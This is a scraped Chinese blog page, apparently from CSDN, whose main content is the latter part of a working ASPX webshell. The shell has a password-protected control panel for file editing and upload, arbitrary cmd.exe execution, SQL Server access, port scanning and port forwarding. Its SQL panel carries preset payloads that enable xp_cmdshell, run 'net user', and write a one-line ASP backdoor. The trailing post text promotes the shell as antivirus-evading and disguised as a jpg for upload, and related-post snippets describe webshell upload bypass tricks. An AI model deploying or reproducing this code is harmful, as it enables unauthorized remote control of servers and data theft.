                Bin_PortPanel.Visible = false;
                Bin_SAexecButton.Visible = false;
                Bin_Scroll.Visible = true;
                Bin_DataGrid.Visible = true;
                Bin_DataGrid.AllowPaging = true;
                Bin_Accbind();
                Bin_DBmenuPanel.Visible = true;
                string sqlstr = Bin_DBstrTextBox.Text;
                sqlstr = sqlstr.TrimStart().ToLower();
                if (sqlstr.Substring(0, 6) == "select")
                {
                    DataTable databind = Bin_DataTable(sqlstr);
                    Bin_DataGrid.DataSource = databind;
                    Bin_DataGrid.DataBind();
                }
                else
                {
                    Bin_ExecSql(sqlstr);
                    Bin_Databind();
                }
            }
            catch (Exception error)
            {
                Bin_Error(error.Message);
            }
        }

        protected void Bin_BDButton_Click(object sender, EventArgs e)
        {
            Bin_DBinfoLabel.Visible = false;
            Bin_Accbind();
            Bin_DBmenuPanel.Visible = true;
            Bin_DataGrid.Visible = false;
            Bin_DataGrid.AllowPaging = true;
            Bin_Scroll.Visible = false;
            Bin_DBstrTextBox.Text = "";
            Bin_SAexecButton.Visible = false;
            Bin_ResLabel.Visible = false;


        }

        protected void Bin_SACMDButton_Click(object sender, EventArgs e)
        {
            Bin_DBinfoLabel.Visible = false;
            Bin_DataGrid.Visible = false;
            Bin_Scroll.Visible = false;
            Bin_SAexecButton.Visible = true;
            Bin_Change();
            Bin_ExecButton.Visible = false;
            Bin_ResLabel.Visible = false;
            Session["Bin_Option"] = null;


        }
        public void Bin_Change()
        {
            Bin_ExecButton.Visible = false;

            Dictionary<string, string> opdic = new Dictionary<string, string>() { {"Add xp_cmdshell",@"sp_configure 'show advanced options',1 reconfigure 
go
sp_configure 'xp_cmdshell',1 reconfigure '"},{"XP_cmdshell exec","Exec master.dbo.xp_cmdshell 'net user'"},{"创建asp文件",@"sp_makewebtask @outputfile='d:\web\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' "}};
            string select = @"<input type=hidden name=goaction><input type=hidden name=todo><input type=hidden name=intext><select οnchange=if(this.value!='')Command('changedata',this);>";
            foreach (var kv in opdic)
            {
                if (Session["Bin_Option"] != null)
                {
                    if (Session["Bin_Option"].ToString() == kv.Key)
                    {
                        select += @"<option SELECTED value=""" + kv.Value + @""">" + kv.Key;
                    }
                    else
                    {

                        select += @"<option value=""" + kv.Value + @""">" + kv.Key;
                    }
                }
                else
                {

                    select += @"<option value=""" + kv.Value + @""">" + kv.Key;
                }

            }


            select += "</select>";
            Bin_AccinfoLabel.Text = select;
            Bin_DataGrid.Visible = false;
            Bin_Scroll.Visible = false;
        }

        protected void Bin_SAexecButton_Click(object sender, EventArgs e)
        {
            try
            {
                Bin_Change();
                Bin_DBinfoLabel.Visible = false;
                Bin_ExecButton.Visible = false;
                Bin_Scroll.Visible = false;
                Bin_DataGrid.Visible = false;
                Bin_DBmenuPanel.Visible = true;
                string sqlstr = Bin_DBstrTextBox.Text;
                DataTable databind = Bin_DataTable(sqlstr);
                string res = "";
                foreach (DataRow dr in databind.Rows)
                {
                    for (int i = 0; i < databind.Columns.Count; i++)
                    {
                        res += dr[i] + "\r";
                    }
                }
                Bin_ResLabel.Text = "<hr><div id=\"nei\"><PRE>" + res.Replace(" ", " ").Replace("<", "<").Replace(">", ">") + "</PRE></div>";


            }
            catch (Exception error)
            {
                Bin_Error(error.Message);
            }

        }













        protected string Rev(NetworkStream instream)
        {
            string Restr = "";
            if (instream.CanRead)
            {
                byte[] buffer = new byte[1024];
                instream.Read(buffer, 0, buffer.Length);
                Restr = Encoding.ASCII.GetString(buffer);
            }
            return "<font color = red>" + Restr + "</font><br>";

        }
        protected string Send(NetworkStream instream, string Sendstr)
        {
            if (instream.CanWrite)
            {
                byte[] buffer = Encoding.ASCII.GetBytes(Sendstr);
                instream.Write(buffer, 0, buffer.Length);
            }
            return "<font color = blue>" + Sendstr + "</font><br>";
        }

        protected void Bin_MapButton_Click(object sender, EventArgs e)
        {
            Bin_MenuPanel.Visible = true;
            Bin_LoginPanel.Visible = false;
            Bin_CmdPanel.Visible = false;
            Bin_SQLPanel.Visible = false;
            hOWTm.Visible = true;


            Bin_PortPanel.Visible = false;

        }
        protected void Bin_PortButton_Click(object sender, EventArgs e)
        {
            Bin_MenuPanel.Visible = true;
            Bin_LoginPanel.Visible = false;
            Bin_CmdPanel.Visible = false;
            Bin_SQLPanel.Visible = false;
            Bin_PortPanel.Visible = true;


            hOWTm.Visible = false;
            Bin_ScanresLabel.Text = "";
        }




        protected void Bin_ScancmdButton_Click(object sender, EventArgs e)
        {
            try
            {
                string res = "";
                string[] port = Bin_PortsTextBox.Text.Split(',');
                for (int i = 0; i < port.Length; i++)
                {
                    res += Bin_Scan(Bin_ScanipTextBox.Text, Int32.Parse(port[i])) + "<br>";
                }
                Bin_ScanresLabel.Text = "<hr>" + res;
            }
            catch (Exception error)
            {
                Bin_Error(error.Message);
            }
        }
        protected string Bin_Scan(string ip, int port)
        {

            string scanres = "";
            TcpClient tcp = new TcpClient();
            tcp.SendTimeout = tcp.ReceiveTimeout = 2000;
            try
            {
                tcp.Connect(ip, port);
                tcp.Close();
                scanres = ip + " : " + port + " ................................. <font color=green><b>Open</b></font>";
            }
            catch (SocketException e)
            {
                scanres = ip + " : " + port + " ................................." + e.Message + " <font color=red><b>Close</b></font>";
            }
            return scanres;
        }


        protected void wDZ(object sender, EventArgs e)
        {
            if (iXdh.Text == "" || eEpm.Text.Length < 7 || ZHS.Text == "") return;
            PortForward gYP = new PortForward();
            gYP.Start(llH.Text, int.Parse(ZHS.Text), eEpm.Text, int.Parse(iXdh.Text));
        }

        protected void vJNsE(object sender, EventArgs e)
        {
            PortForward gYP = new PortForward();
            gYP.lyTOK();

        }
        protected void tYoZ(object sender, EventArgs e)
        {
        }
            
    </script>
    <script type="text/javascript" language="javascript">
        function Command(cmd, str) {
            var strTmp = str;
            var frm = document.forms[0];
            if (cmd == 'del') {
                if (confirm('确定删除文件 ?')) {
                    frm.todo.value = str;
                    frm.goaction.value = cmd;
                    frm.submit();
                }
                else return;
            }
            if (cmd == 'change') {
                frm.todo.value = str;
                frm.goaction.value = cmd;
                frm.submit();
            }
            if (cmd == 'down') {
                frm.todo.value = str;
                frm.goaction.value = cmd;
                frm.submit();
            }
            if (cmd == 'showatt') {
                frm.todo.value = str;
                frm.goaction.value = cmd;
                frm.submit();
            }
            if (cmd == 'edit') {
                frm.todo.value = str;
                frm.goaction.value = cmd;
                frm.submit();
            }
            if (cmd == 'deldir') {
                if (confirm('确定删除文件夹 ?')) {
                    frm.todo.value = str;
                    frm.goaction.value = cmd;
                    frm.submit();
                }
                else return;
            }
            if (cmd == 'rename') {
                frm.goaction.value = cmd;
                frm.todo.value = str + ',';
                str = prompt('新文件名:', strTmp);
                if (str && (strTmp != str)) {
                    frm.todo.value += str;
                    frm.submit();
                }
                else return;
            }

            if (cmd == 'kill') {
                frm.goaction.value = cmd;
                frm.todo.value = str ;
                frm.submit();
                          
            }
            if (cmd == 'renamedir') {
                frm.goaction.value = cmd;
                frm.todo.value = str + ',';
                str = prompt('新文件夹名:', strTmp);
                if (str && (strTmp != str)) {
                    frm.todo.value += str;
                    frm.submit();
                }
                else return;
            }
            if (cmd == 'postdata') {
                frm.todo.value = str.value;
                frm.goaction.value = cmd;
                frm.submit();
            }

            if (cmd == 'postdatabase') {
                frm.todo.value = str.value;
                frm.goaction.value = cmd;
                frm.submit();
            }
            if (cmd == 'changedata') {
                frm.todo.value = str.value;
                frm.intext.value = str.options[str.selectedIndex].innerText
                frm.goaction.value = cmd;
                frm.submit();
            }
        }

    </script>
</head>
<body>
    <form id="form1" runat="server">
        <div style="text-align: center">
            <asp:Panel ID="Bin_LoginPanel" runat="server" Height="47px" Width="401px">
                <asp:Label ID="PassLabel" runat="server" Text="密码:"></asp:Label>
                <asp:TextBox ID="passtext" runat="server" TextMode="Password" Width="203px"></asp:TextBox>
                <asp:Button ID="LoginButton" runat="server" Text="进入" OnClick="LoginButton_Click" />
            </asp:Panel>
            <asp:Panel ID="Bin_MenuPanel" runat="server" Height="56px" Width="771px">
                <asp:Label ID="TimeLabel" runat="server" Text="" Width="350px"></asp:Label><br />
                <asp:Button ID="MainButton" runat="server" OnClick="MainButton_Click" Text="系统信息" />
             
                <asp:Button ID="FileButton" runat="server" OnClick="FileButton_Click" Text="文件管理" />
                <asp:Button ID="Bin_CmdButton" runat="server" Text="命令行" OnClick="Bin_CmdButton_Click" />
                <asp:Button ID="Bin_SQLButton" runat="server" OnClick="Bin_SQLButton_Click" Text="数据库" /> 
                <asp:Button ID="Bin_PortButton" runat="server" Text="端口扫描" OnClick="Bin_PortButton_Click" />
                <asp:Button ID="Bin_MapButton" runat="server" Text="端口映射" OnClick="Bin_MapButton_Click" />
                <asp:Button ID="LogoutButton" runat="server" OnClick="LogoutButton_Click" Text="注销" /><br />
                <asp:Label ID="Bin_ErrorLabel" runat="server" EnableViewState="False"></asp:Label>
            </asp:Panel>
            <asp:Panel ID="Bin_MainPanel" runat="server" Width="769px" EnableViewState="False" Visible="False" Height="20px">
                <div style="text-align: left">
                    <asp:Label ID="InfoLabel" runat="server" Width="765px" EnableViewState="False"></asp:Label></div>
            </asp:Panel>
            <div style="text-align: center">
                <asp:Panel ID="Bin_FilePanel" runat="server" Width="767px" EnableViewState="False" Visible="False">
                    <div style="text-align: left">
                        <asp:Label ID="Bin_FileLabel" runat="server" Text="Label" Width="764px"></asp:Label><br />
                        <asp:Label ID="Bin_UpfileLabel" runat="server" Text="上传文件 :  "></asp:Label>
                        <input class="TextBox" id="Bin_UpFile" type="file" name="upfile" runat="server" /> <asp:TextBox ID="Bin_upTextBox" runat="server" Width="339px"></asp:TextBox> 
                <asp:Button ID="Bin_GoButton" runat="server" OnClick="Bin_GoButton_Click" Text="GO" />
                        <asp:Button ID="Bin_upButton" runat="server" Text="上传" OnClick="Bin_upButton_Click" EnableViewState="False" /><br />
                        <asp:Label ID="Bin_CreateLabel" runat="server" Text="创建 :"></asp:Label>
                        <asp:TextBox ID="Bin_CreateTextBox" runat="server"></asp:TextBox><asp:Button ID="Bin_NewFileButton"
                            runat="server" Text="新建文件" OnClick="Bin_NewFileButton_Click" />
                        <asp:Button ID="Bin_NewdirButton" runat="server" Text="新建目录" OnClick="Bin_NewdirButton_Click" />
                        <br />
                        <asp:Label ID="Bin_CopyLabel" runat="server" Text="复制 :" Width="39px"></asp:Label>
                         
            <asp:TextBox ID="Bin_CopyTextBox" runat="server" Width="273px"></asp:TextBox>
                        <asp:Label ID="Bin_CopytoLable" runat="server" Text="到:"></asp:Label>
                        <asp:TextBox ID="Bin_CopytoTextBox" runat="server" Width="268px"></asp:TextBox>
                        <asp:Button ID="Bin_CopyButton" runat="server" Text="复制" OnClick="Bin_CopyButton_Click" />
                        <asp:Button ID="Bin_CutButton" runat="server" Text="剪切" Width="46px" OnClick="Bin_CutButton_Click" />
                        <asp:Label ID="Bin_FilelistLabel" runat="server" EnableViewState="False"></asp:Label>
                    </div>
                    <div style="text-align: center">
                        <asp:Panel ID="Bin_AttPanel" runat="server" Width="765px" Visible="False">
                            <hr />
                            文件名 :
                    <asp:Label ID="Bin_AttLabel" runat="server" Text="Label"></asp:Label><br />
                            <asp:CheckBox ID="Bin_ReadOnlyCheckBox" runat="server" Text="只读" />
                            <asp:CheckBox ID="Bin_SystemCheckBox" runat="server" Text="系统" />
                            <asp:CheckBox ID="Bin_HiddenCheckBox" runat="server" Text="隐藏" />
                            <asp:CheckBox ID="Bin_ArchiveCheckBox" runat="server" Text="存档" />
                            <br />
                            创建时间 :
                    <asp:TextBox ID="Bin_CreationTimeTextBox" runat="server" Width="123px"></asp:TextBox>
                            写入时间 :
                    <asp:TextBox ID="Bin_LastWriteTimeTextBox" runat="server" Width="129px"></asp:TextBox>
                            操作时间 :
                    <asp:TextBox ID="Bin_AccessTimeTextBox" runat="server" Width="119px"></asp:TextBox><br />
                            <asp:Button ID="Bin_SetButton" runat="server" OnClick="Bin_SetButton_Click" Text="设置" />
                            <asp:Button ID="Bin_SbackButton" runat="server" OnClick="Bin_SbackButton_Click" Text="后退" />
                            <hr />
                        </asp:Panel>
                    </div>
                    <div style="text-align: center">
                        <asp:Panel ID="Bin_EditPanel" runat="server" Visible="False">
                            <hr style="width: 757px" />
                            路径:<asp:TextBox ID="Bin_EditpathTextBox" runat="server" Width="455px"></asp:TextBox><br />
                            <asp:TextBox ID="Bin_EditTextBox" runat="server" TextMode="MultiLine" Columns="100" Rows="25" Width="760px"></asp:TextBox><br />
                            <asp:Button ID="Bin_EditButton" runat="server" Text="提交" OnClick="Bin_EditButton_Click" /> <asp:Button
                                ID="Bin_BackButton" runat="server" OnClick="Bin_BackButton_Click" Text="后退" />
                        </asp:Panel>
                    </div>
                </asp:Panel>
            </div>
            <asp:Panel ID="Bin_CmdPanel" runat="server" Height="50px" Width="763px">
                <hr />
                Cmd路径 :  <asp:TextBox ID="Bin_CmdPathTextBox" runat="server" Width="395px">C:\Windows\System32\Cmd.exe</asp:TextBox><br />
                参数 :
                    <asp:TextBox ID="Bin_CmdShellTextBox" runat="server" Width="395px">/c Set</asp:TextBox><br />
                <asp:Button ID="Bin_RunButton" runat="server" OnClick="Bin_RunButton_Click" Text="执行" />
                <div style="text-align: left">
                    <asp:Label ID="Bin_CmdLabel" runat="server" EnableViewState="False"></asp:Label>
                </div>
                <hr />
            </asp:Panel>
            <asp:Panel ID="Bin_SQLPanel" runat="server" Visible="False" Width="763px">
                <hr />
                ConnString :
            <asp:TextBox ID="Bin_SQLconnTextBox" runat="server" Width="500px">server=localhost;UID=sa;PWD=sqlsql;database=master;Provider=SQLOLEDB</asp:TextBox>
                <asp:Button ID="SQL_SumbitButton" runat="server" Text="登陆" OnClick="SQL_SumbitButton_Click" />
                <asp:Panel ID="Bin_DBmenuPanel" runat="server" Width="759px" Visible="False">
                    <asp:Button ID="Bin_BDButton" runat="server" Text="数据获取" OnClick="Bin_BDButton_Click" />
                    <asp:Button ID="Bin_SACMDButton" runat="server" Text="执行操作" OnClick="Bin_SACMDButton_Click" />
                                       
                    <div style="text-align: left">
                        <asp:Label ID="Bin_DBinfoLabel" runat="server" Text="" EnableViewState="False"></asp:Label>
                    </div>
                </asp:Panel>
                <asp:Panel ID="Bin_AccPanel" runat="server" Height="50px" Width="759px" EnableViewState="False">
                    <asp:Label ID="Bin_AccinfoLabel" runat="server" Text="Label" EnableViewState="False"></asp:Label><br />
                    <asp:TextBox ID="Bin_DBstrTextBox" runat="server" TextMode="MultiLine" Width="569px"></asp:TextBox>
                    <asp:Button ID="Bin_ExecButton" runat="server" OnClick="Bin_ExecButton_Click" Text="执行" />
                    <asp:Button ID="Bin_SAexecButton" runat="server" Text="执行" OnClick="Bin_SAexecButton_Click" /><br />
                    <div style="text-align: left">
                        <asp:Label ID="Bin_ResLabel" runat="server" Text=""></asp:Label>
                    </div>
                </asp:Panel>
                
                <br />
                <br />
                <div style="overflow: scroll; text-align: left; width: 770px;" id="Bin_Scroll" runat="server" visible="false">
                    <asp:DataGrid ID="Bin_DataGrid" runat="server" Width="753px" PageSize="20" CssClass="Bin_DataGrid" OnItemDataBound="Item_DataBound" AllowPaging="True" OnPageIndexChanged="Bin_DBPage" OnItemCommand="Item_Command">
                        <PagerStyle Mode="NumericPages" Position="TopAndBottom" />
                    </asp:DataGrid>
                </div>
            </asp:Panel>

          
            
            <asp:Panel ID="Bin_PortPanel" runat="server" Width="763px">
                <hr />
                <div style="text-align: left">
                    IP :
                <asp:TextBox ID="Bin_ScanipTextBox" runat="server" Width="194px">127.0.0.1</asp:TextBox>
                    端口 :
            <asp:TextBox ID="Bin_PortsTextBox" runat="server" Width="356px">21,80,1433,3306,3389,4899,5631,43958,65500</asp:TextBox>
                    <asp:Button ID="Bin_ScancmdButton" runat="server" Text="扫描" OnClick="Bin_ScancmdButton_Click" /><br />
                    <asp:Label ID="Bin_ScanresLabel" runat="server"></asp:Label>
                </div>
                <hr />
            </asp:Panel>
            <asp:Panel ID="hOWTm" runat="server" Width="763px">
                <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin: 10px 0;">
                    <tr align="center">
                        <td style="width: 5%"></td>
                        <td style="width: 20%" align="left">本地Ip :
                            <asp:TextBox ID="eEpm" runat="server" Text="127.0.0.1"></asp:TextBox></td>
                        <td style="width: 20%" align="left">本地端口 :<asp:TextBox ID="iXdh" runat="server" Text="3389"></asp:TextBox></td>
                        <td style="width: 20%" align="left">远程Ip :
                            <asp:TextBox ID="llH" runat="server" Text="127.0.0.1"></asp:TextBox></td>
                        <td style="width: 20%" align="left">远端口程 :
                            <asp:TextBox ID="ZHS" runat="server" Text="80"></asp:TextBox></td>
                    </tr>
                    <tr align="center">
                        <td colspan="5">
                            <br />
                            <asp:Button ID="FJE" CssClass="bt" runat="server" Text="映射端口" OnClick="wDZ" />
                            <asp:Button ID="giX" CssClass="bt" runat="server" Text="重置状态" OnClick="vJNsE" />
                            <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="刷新" OnClick="tYoZ" /></td>
                    </tr>
                </table>

            </asp:Panel>
        </div>
    </form>
</body>
</html>


亲自制最后一个就是webshell图片文件

王cb
关注
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360node32aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能...
手把手教萌新3:认识LDEL窗口
him_in_minecraft的博客
09-11 774
哈喽大家好,这里是him_in_minecraft. 上期我们学习了交互式窗口和print()。 这期我们学习一个新的窗口:LDEL窗口 打开它十分的简单: 打开交互式窗口=>鼠标点击左上角的File=> 选择New File 当当当当,是不是非常简单,你学废了吗? 其实这两个窗口是有区别的: 在交互式窗口中,我们只能单行输入代码: 而在LDEL窗口中,我们能实现多行代码一起输出: 这在后来的大编程中十分有用!! 现在,让我们学习LDEL窗口的使...
上传图片 webshell php,webshell后门上传流程
weixin_42522626的博客
03-17 1655
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?ph...
文件上传-图片webshell上传
qq_25899635的博客
05-21 4601
图片webshell制作 在服务器端的PHP代码中,对于用户上传的文件做文件类型检查,查看文件格式是否符合上传规范。可以检查文件二进制格式的前几个字节,从而判断文件类型是否正确。 针对这种情况可以直接新建要给1.jpg,其中代码内容如下: GIF98A <?php phpinfo(); ?> 上传图片webshell文件 将制作好的图片webshell上传到服务器。 其中可能Cont...
aspx到webshell肉鸡
05-15 6462
笔者一直都在强调一个东西,在网络攻防中最重要的就是思维。本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.net类型后门软件,在安全界中最近一直流行后门中的后门,即通过给出一个包含后门的Webshell程序,众多小黑们在外面吭哧吭哧的干活,而给出后门的老板,却在后面偷着数Webshell,这种后门中的后门一般来说有二种类型,一种就是直接挂马,带来直接的收益;另外
webshell gif图片文件绕过
墨痕诉清风的博客
04-26 1081
现在需要将请求发送到repeater,以便编辑它并注入PHP反向shell。在下面的请求中,确保文件名以“.php”结尾,并且原始请求的第一行被保留,因为这些是用于识别正在上传的文件类型的魔术字节。然后在magic byte sequence下面我们可以注入一个PHP Reverse shell。目录页/dev/index. php允许GIF上传。尝试上传不同的文件类型将被拒绝。上传文件并使用Burpsuite捕获请求。这可以通过首先上传合法的GIF文件来绕过。完成后,发送请求并检查是否上传。
node文字生成图片的示例代码
12-23
Node.js环境中,生成文字图片的需求常常出现在各种场景,如创建邀请卡、生成动态海报等。本示例代码提供了一种方法,通过将文字转换为SVG(可缩放矢量图形),然后再将SVG转换为PNG,最后将这些PNG图片合并到原始...
Node.js在图片模板上生成二维码图片并附带底部文字说明实现详解
10-16
Node.js环境中,生成带有二维码和底部文字说明的图片模板是一项常见的需求,这通常用于创建具有视觉吸引力且信息丰富的营销或信息分享材料。本篇文章主要介绍如何利用Node.js的几个库来实现这一功能。 首先,我们...
详解基于electron制作一个node压缩图片的桌面应用
01-02
基于electron制作一个node压缩图片的桌面应用 下载地址:https://github.com/zenoslin/imagemin-electron/releases 项目源码Github:https://github.com/zenoslin/imagemin-electron 准备工作 我们来整理一下我们...
ASPX 1句话SHELL
收集盒 Book box
11-09 602
ISTO的版本     ASPX One Code     " enctype="multipart/form-data"> filename:          c# if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }
aspx 版webshell
01-16
此文件是一个是一个别人写的webshll,开发环境c#
Shell脚本实现二维码图片生成
10-02
这个shell脚本是我在工作中开发的,适合在旧有系统,无源码但又希望实现二维码打印功能的系统
ASPX一句话shell客户端+ASPXshell MS08-067插件
12-28
ASPX一句话shell客户端+ASPXshell MS08-067插件
关于CPU指标的解释
qq_35789269的博客
03-28 755
背景:最近在定位性能问题的时候,用监控发现很多指标看不懂,这里总结一下cpu监控指标 User User表示:CPU一共花了多少比例的时间运行在用户态空间或者说是用户进程(running user space processes)。典型的用户态空间程序有:Shells、数据库、web服务器…… System System的含义与User相似。System表示:CPU花了多少比例的时间在内核空间运行。分配内存、IO操作、创建子进程……都是内核操作。这也表明,当IO操作频繁时,System参..
手把手教萌新2:认识python交互式窗口
him_in_minecraft的博客
09-05 4536
打开python交互式窗口有两种方式: 1.直接双击LDEL: 2.用cmd打开: 按下 开始=>输入cmd=>按下Enter键(打开cmd)=>出入python(进入交互式窗口): 额,这不是本节重点,下面我们进入正题吧! 这就是LDEL交互式窗口: 下面,我们开始教学! 一、我们可以输入任意数字: 我们可以看到,python会输出你写的任何数字,并且变蓝!(是不是很有趣......) 二、我们试一下输入字母: 天哪!怎么不是我...
文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用之远程包含Webshell
最新发布
m0_73720136的博客
05-07 3845
通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片马上传,图片马上传成功不能直接解析,可以利用文件包含的特点进行解析图片马。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木马文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木马文件,从而Getshell
linux shell 生成图片,shell脚本自动下载网页图片
weixin_26913055的博客
05-13 668
1、技术思路网页其实就是包含HTML标记和其他诸如Javascript、Css等元素的HTML页面。HTML标记是网页的基础。当我们下载网页的时候,其实接受的就是一个HTML文件。这种格式化的数据需要用浏览器查看。当然,我们也可以自己来处理HTML文件,抽离自己需要的数据,这个过程本质就是HTML字符串的处理。现在,我们就来展示如何使用shell脚本来下载一个网页内的所有相关图片。2、脚本代码及其...
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门)
热门推荐
weixin_43263566的博客
01-25 1万+
Webshell(网页后门)
shell 免杀aspx_发个免杀修改的aspx提权马qingshell.aspx
weixin_35795675的博客
01-30 609
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
Node.js实现自定义代码生成器:步骤与实战
在本文中,我们将探讨如何使用Node.js来创建一个代码生成器,它是一个实用且灵活的工具,特别适合集成到小型项目中,如lazy-mock,一个提供mock server服务的工具。该工具的核心功能是自动生成Curd(Create, Read, ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值